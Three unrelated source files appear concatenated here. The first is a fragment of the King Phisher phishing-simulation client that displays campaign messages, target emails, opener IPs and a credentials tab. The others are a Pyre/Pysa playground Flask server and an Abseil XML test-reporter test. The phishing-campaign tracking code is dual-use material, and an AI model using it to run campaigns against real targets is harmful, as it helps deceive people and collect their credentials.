visitor_ip = ipaddress.ip_address(visitor_ip)
if visitor_ip.is_loopback:
geo_location = 'N/A (Loopback)'
elif visitor_ip.is_private:
geo_location = 'N/A (Private)'
elif isinstance(visitor_ip, ipaddress.IPv6Address):
geo_location = 'N/A (IPv6 Address)'
elif node['ipGeoloc']:
geo_location = node['ipGeoloc']['city']
row = (
node['message']['targetEmail'],
str(visitor_ip),
node['count'],
node['userAgent'],
geo_location,
node['firstSeen'],
node['lastSeen']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
table_name = 'messages'
label_text = 'Messages'
node_query = """\
query getMessage($id: String!) {
db {
node: message(id: $id) {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
}
"""
table_query = """\
query getMessages($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
messages(first: $count, after: $cursor) {
total
edges {
node {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Sent',
'Trained',
'Department',
'Opened',
'Opener IP Address',
'Opener User Agent'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 30, 15, 20, 20, 25, 90),
title=label_text
)
def format_node_data(self, node):
department = node['companyDepartment']
if department:
department = department['name']
row = (
node['targetEmail'],
node['sent'],
('Yes' if node['trained'] else ''),
department,
node['opened'],
node['openerIp'],
node['openerUserAgent']
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, parent, application):
"""
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
:param application: The main client application instance.
:type application: :py:class:`Gtk.Application`
"""
self.parent = parent
self.application = application
self.config = application.config
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = utilities.FreezableDict()
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(application)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(application)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(application)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(application)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
if self.config.get('gui.show_deaddrop', False):
deaddrop_connections_tab = CampaignViewDeaddropTab(application)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
self.tabs.freeze()
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab in self.tabs.values():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=False)
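# Illustrative sketch (hypothetical, not part of King Phisher): embedding the
# top-level CampaignViewTab only requires the parent Gtk.Window and the client
# application instance described in __init__() above; both arguments are
# placeholders supplied by the caller.
def example_embed_campaign_view(parent_window, application):
	view_tab = CampaignViewTab(parent_window, application)
	notebook = Gtk.Notebook()
	notebook.append_page(view_tab.box, view_tab.label)
	notebook.show()
	return view_tab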
|
application.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, jsonify, request
from flask_cors import CORS
# pyre-fixme[21]: pyre cannot seem to find this module
from flask_socketio import emit, SocketIO
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
buffer: List[str] = []
def _consume() -> None:
while True:
line = stream.readline()
if line:
decoded = line.strip()
LOG.debug(decoded)
buffer.append(decoded)
else:
break
thread = threading.Thread(target=_consume)
thread.start()
thread.join()
return "\n".join(buffer)
class Pyre:
def __init__(self) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Starting server in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
LOG.debug("Writing watchman configuration")
watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
watchman_configuration_path.write_text("{}\n")
LOG.debug("Starting watchman")
subprocess.check_call(["watchman", "watch", str(self._directory)])
LOG.debug("Priming the server")
subprocess.check_call(
["pyre", "--noninteractive"],
cwd=self._directory,
)
def check(self, input: str) -> str:
LOG.debug("Running pyre check")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
with subprocess.Popen(
["pyre", "--output=json", "--noninteractive"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stderr = _consume(process.stderr)
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stdout = _consume(process.stdout)
return_code = process.wait()
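            # The branch below assumes exit codes above 1 mean the pyre run
            # itself failed, while 0 or 1 means results were produced on stdout.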
if return_code > 1:
LOG.error(f"Returning error: {stderr}")
result = jsonify(errors=[stderr])
else:
errors = json.loads(stdout)
result = jsonify(data={"errors": errors, "stderr": stderr})
return result
class Pysa:
def __init__(
self, input: str, model: str = "", use_builtin_pysa_models: bool = False
) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
self._stubs: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Intializing Pysa in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
"taint_models_path": [
str(self._stubs),
os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
]
if use_builtin_pysa_models
else str(self._stubs),
"search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
if model:
LOG.debug("Writing custom model to pysa file")
model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
model_path.write_text(model)
LOG.debug(f"Writing code:\n{input}")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
def analyze(self) -> None:
LOG.debug("Running pysa")
with subprocess.Popen(
["pyre", "-n", "analyze"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
model_verification_errors = []
# pyre-fixme[16]: process.stderr is marked as Optional
            for line in iter(process.stderr.readline, ""):
line = line.rstrip()
if line == "":
break
elif "ERROR" in line and "is not part of the environment" in line:
model_verification_errors.append(line)
elif "INFO" in line or "ERROR" in line:
if model_verification_errors:
# Emit all model verification lines together to prevent
# network overhead.
model_verification_error_output = "\n".join(
model_verification_errors
)
emit(
"pysa_results_channel",
{
"type": "output",
"line": model_verification_error_output,
},
)
LOG.debug(model_verification_error_output)
model_verification_errors = []
emit("pysa_results_channel", {"type": "output", "line": line})
LOG.debug(line)
return_code = process.wait()
if return_code != 0:
result = {"type": "finished", "result": "error"}
else:
result = {"type": "finished", "result": "ok"}
emit("pysa_results_channel", result)
def run_server(debug: bool) -> None:
application = Flask(__name__)
# You may need to modify the origin to the pyre-check website
# before deployment.
CORS(application)
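    # For example (hypothetical origin, adjust for the actual deployment):
    # CORS(application, origins=["https://pyre-check.org"])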
socketio = SocketIO(application, cors_allowed_origins="*")
LOG.info("Initializizing the pyre server")
pyre = Pyre()
LOG.info("Pyre server is initialized, configuring application routes")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
input = (
request.args.get("input")
or request.form.get("input")
or request.json.get("input")
)
if input is None:
return jsonify(errors=["Input not provided"])
LOG.info(f"Checking `{input}`...")
return pyre.check(input)
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
input = json.get("input", None)
use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
model = json.get("model", "")
if input is None:
emit(
"pysa_results_channel",
{
"type": "finished",
"result": "error",
"reason": "No code given to analyze.",
},
)
else:
pysa = Pysa(input, model, use_builtin_pysa_models)
LOG.info(f"Checking `{input}`...")
pysa.analyze()
@application.route("/")
def index() -> str:
return "404"
socketio.run(application, debug=debug)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
run_server(debug=arguments.debug)
|
xml_reporter_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from xml.etree import ElementTree
from xml.parsers import expat
from absl import logging
from absl.testing import _bazelize_command
from absl.testing import absltest
from absl.testing import parameterized
from absl.testing import xml_reporter
from absl.third_party import unittest3_backport
import mock
import six
class StringIOWriteLn(six.StringIO):
def writeln(self, line):
self.write(line + '\n')
class MockTest(absltest.TestCase):
failureException = AssertionError
def __init__(self, name):
super(MockTest, self).__init__()
self.name = name
def id(self):
return self.name
def runTest(self):
return
def shortDescription(self):
return "This is this test's description."
# str(exception_type) is different between Python 2 and 3.
def xml_escaped_exception_type(exception_type):
return xml_reporter._escape_xml_attr(str(exception_type))
OUTPUT_STRING = '\n'.join([
r'<\?xml version="1.0"\?>',
'<testsuites name="" tests="%(tests)d" failures="%(failures)d"'
' errors="%(errors)d" time="%(run_time).1f">',
'<testsuite name="%(suite_name)s" tests="%(tests)d"'
' failures="%(failures)d" errors="%(errors)d" time="%(run_time).1f">',
' <testcase name="%(test_name)s" status="%(status)s" result="%(result)s"'
' time="%(run_time).1f" classname="%(classname)s">%(message)s',
' </testcase>',
'</testsuite>',
'</testsuites>'])
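# OUTPUT_STRING and the *_MESSAGE constants below are regular-expression
# templates; each test fills in the placeholders and matches the result
# against the XML produced by the reporter under test.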
FAILURE_MESSAGE = r"""
<failure message="e" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_failure
raise AssertionError\(\'e\'\)
AssertionError: e
\]\]></failure>""".format(xml_escaped_exception_type(AssertionError))
ERROR_MESSAGE = r"""
<error message="invalid literal for int\(\) with base 10: (')?a(')?" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_error
int\('a'\)
ValueError: invalid literal for int\(\) with base 10: '?a'?
\]\]></error>""".format(xml_escaped_exception_type(ValueError))
UNICODE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_unicode_sample_failure
raise AssertionError\(u'\\xe9'\)
AssertionError: {0}
\]\]></%s>""".format(
r'\\xe9' if six.PY2 else r'\xe9',
xml_escaped_exception_type(AssertionError))
NEWLINE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_newline_message_sample_failure
raise AssertionError\(\'{2}'\)
AssertionError: {3}
\]\]></%s>""".format(
    'new&#xA;line',
xml_escaped_exception_type(AssertionError),
r'new\\nline',
'new\nline')
UNEXPECTED_SUCCESS_MESSAGE = '\n'.join([
'',
r' <error message="" type=""><!\[CDATA\[Test case '
r'__main__.MockTest.unexpectedly_passing_test should have failed, '
r'but passed.\]\]></error>'])
UNICODE_ERROR_MESSAGE = UNICODE_MESSAGE % ('error', 'error')
NEWLINE_ERROR_MESSAGE = NEWLINE_MESSAGE % ('error', 'error')
class TextAndXMLTestResultTest(absltest.TestCase):
def setUp(self):
self.stream = StringIOWriteLn()
self.xml_stream = six.StringIO()
def _make_result(self, times):
timer = mock.Mock()
timer.side_effect = times
return xml_reporter._TextAndXMLTestResult(self.xml_stream, self.stream,
'foo', 0, timer)
def _assert_match(self, regex, output):
self.assertRegex(output, regex)
def _assert_valid_xml(self, xml_output):
try:
expat.ParserCreate().Parse(xml_output)
except expat.ExpatError as e:
raise AssertionError('Bad XML output: {}\n{}'.format(e, xml_output))
def _simulate_error_test(self, test, result):
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
def _simulate_failing_test(self, test, result):
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
def _simulate_passing_test(self, test, result):
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
def test_with_passing_test(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': r'passing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest_with_dots_in_parameter_name(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', {'case': 'a.b.c'})
else:
# In Python 3 subTest uses a ChainMap to hold the parameters, but ChainMap
# does not exist in Python 2, so a list of dict is used to simulate the
# behavior of a ChainMap. This is why a list is provided as a parameter
# here.
subtest = unittest3_backport.case._SubTest(test, 'msg',
[{'case': 'a.b.c'}])
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name':
            r'passing_test \[msg\] \(case=&apos;a.b.c&apos;\)',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def get_sample_error(self):
try:
int('a')
except ValueError:
error_values = sys.exc_info()
return error_values
def get_sample_failure(self):
try:
raise AssertionError('e')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_newline_message_sample_failure(self):
try:
raise AssertionError('new\nline')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_unicode_sample_failure(self):
try:
raise AssertionError(u'\xe9')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_terminal_escape_sample_failure(self):
try:
raise AssertionError('\x1b')
except AssertionError:
error_values = sys.exc_info()
return error_values
def test_with_failing_test(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_failing_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_failure())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'test_name': r'failing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_error_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.error_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_error())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': r'error_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_fail_and_error_test(self):
"""Tests a failure and subsequent error within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
# This could happen in tearDown
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1, # Only the failure is tallied (because it was first).
'errors': 0,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from failure and error should be concatenated in order.
'message': FAILURE_MESSAGE+ERROR_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_error_and_fail_test(self):
"""Tests an error and subsequent failure within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_sample_error())
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1, # Only the error is tallied (because it was first).
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from error and failure should be concatenated in order.
'message': ERROR_MESSAGE+FAILURE_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_newline_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_newline_message_sample_failure())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': NEWLINE_ERROR_MESSAGE} + '\n'
self._assert_match(expected_re, xml)
def test_with_unicode_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_unicode_sample_failure())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNICODE_ERROR_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_terminal_escape_error(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_terminal_escape_sample_failure())
result.stopTest(test)
result.printErrors()
self._assert_valid_xml(self.xml_stream.getvalue())
def test_with_expected_failure_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
error_values = ''
try:
raise RuntimeError('Test expectedFailure')
except RuntimeError:
error_values = sys.exc_info()
test = MockTest('__main__.MockTest.expected_failing_test')
result.startTest(test)
result.addExpectedFailure(test, error_values)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'expected_failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(re.compile(expected_re, re.DOTALL),
self.xml_stream.getvalue())
def test_with_unexpected_success_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.unexpectedly_passing_test')
result.startTest(test)
result.addUnexpectedSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'unexpectedly_passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNEXPECTED_SUCCESS_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_skipped_test(self):
start_time = 100
end_time = 100
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.skipped_test_with_reason')
result.startTest(test)
result.addSkip(test, 'b"r')
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'skipped_test_with_reason',
'classname': '__main__.MockTest',
'status': 'notrun',
'result': 'suppressed',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_suite_time(self):
start_time1 = 100
end_time1 = 200
start_time2 = 400
end_time2 = 700
name = '__main__.MockTest.failing_test'
result = self._make_result((start_time1, end_time1, start_time2, end_time2))
test = MockTest('%s1' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
test = MockTest('%s2' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time1 = end_time1 - start_time1
run_time2 = end_time2 - start_time2
expected_prefix = """<?xml version="1.0"?>
<testsuites name="" tests="2" failures="0" errors="0" time="%.1f">
<testsuite name="MockTest" tests="2" failures="0" errors="0" time="%.1f">
""" % (run_time1 + run_time2, run_time1 + run_time2)
self.failUnless(self.xml_stream.getvalue().startswith(expected_prefix))
def test_with_no_suite_name(self):
start_time = 1000
end_time = 1200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.bad_name')
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'bad_name',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_unnamed_parameterized_testcase(self):
"""Test unnamed parameterized test cases.
Unnamed parameterized test cases might have non-alphanumeric characters in
their test method names. This test ensures xml_reporter handles them
correctly.
"""
class ParameterizedTest(parameterized.TestCase):
@parameterized.parameters(('a (b.c)',))
def test_prefix(self, case):
self.assertTrue(case.startswith('a'))
start_time = 1000
end_time = 1200
result = self._make_result((start_time, end_time))
test = ParameterizedTest(methodName='test_prefix0')
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
classname = xml_reporter._escape_xml_attr(
unittest.util.strclass(test.__class__))
expected_re = OUTPUT_STRING % {
'suite_name': 'ParameterizedTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
        'test_name': re.escape('test_prefix(&apos;a (b.c)&apos;)'),
'classname': classname,
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def teststop_test_without_pending_test(self):
end_time = 1200
result = self._make_result((end_time,))
test = MockTest('__main__.MockTest.bad_name')
result.stopTest(test)
# Just verify that this doesn't crash
def test_text_and_xmltest_runner(self):
runner = xml_reporter.TextAndXMLTestRunner(self.xml_stream, self.stream,
'foo', 1)
result1 = runner._makeResult()
result2 = xml_reporter._TextAndXMLTestResult(None, None, None, 0, None)
self.failUnless(type(result1) is type(result2))
def test_timing_with_time_stub(self):
"""Make sure that timing is correct even if time.time is stubbed out."""
try:
saved_time = time.time
time.time = lambda: -1
reporter = xml_reporter._TextAndXMLTestResult(self.xml_stream,
self.stream,
'foo', 0)
test = MockTest('bar')
reporter.startTest(test)
self.failIf(reporter.start_time == -1)
finally:
time.time = saved_time
def test_concurrent_add_and_delete_pending_test_case_result(self):
"""Make sure adding/deleting pending test case results are thread safe."""
result = xml_reporter._TextAndXMLTestResult(None, self.stream, None, 0,
None)
def add_and_delete_pending_test_case_result(test_name):
test = MockTest(test_name)
result.addSuccess(test)
result.delete_pending_test_case_result(test)
for i in range(50):
add_and_delete_pending_test_case_result('add_and_delete_test%s' % i)
self.assertEqual(result.pending_test_case_results, {})
def test_concurrent_test_runs(self):
"""Make sure concurrent test runs do not race each other."""
num_passing_tests = 20
num_failing_tests = 20
num_error_tests = 20
total_num_tests = num_passing_tests + num_failing_tests + num_error_tests
times = [i for i in range(2*total_num_tests)]
result = self._make_result(times)
threads = []
names = []
for i in range(num_passing_tests):
name = 'passing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
# xml_reporter uses id(test) as the test identifier.
# In a real testing scenario, all the test instances are created before
# running them. So all ids will be unique.
# We must do the same here: create test instance beforehand.
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_passing_test, args=(test, result)))
for i in range(num_failing_tests):
name = 'failing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_failing_test, args=(test, result)))
for i in range(num_error_tests):
name = 'error_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_error_test, args=(test, result)))
for t in threads:
t.start()
for t in threads:
t.join()
result.printErrors()
tests_not_in_xml = []
for tn in names:
if tn not in self.xml_stream.getvalue():
tests_not_in_xml.append(tn)
msg = ('Expected xml_stream to contain all test %s results, but %s tests '
'are missing. List of missing tests: %s' % (
total_num_tests, len(tests_not_in_xml), tests_not_in_xml))
self.assertEqual([], tests_not_in_xml, msg)
def test_add_failure_during_stop_test(self):
"""Tests an addFailure() call from within a stopTest() call stack."""
result = self._make_result((0, 2))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
# Replace parent stopTest method from unittest3_backport.TextTestResult with
# a version that calls self.addFailure().
with mock.patch.object(
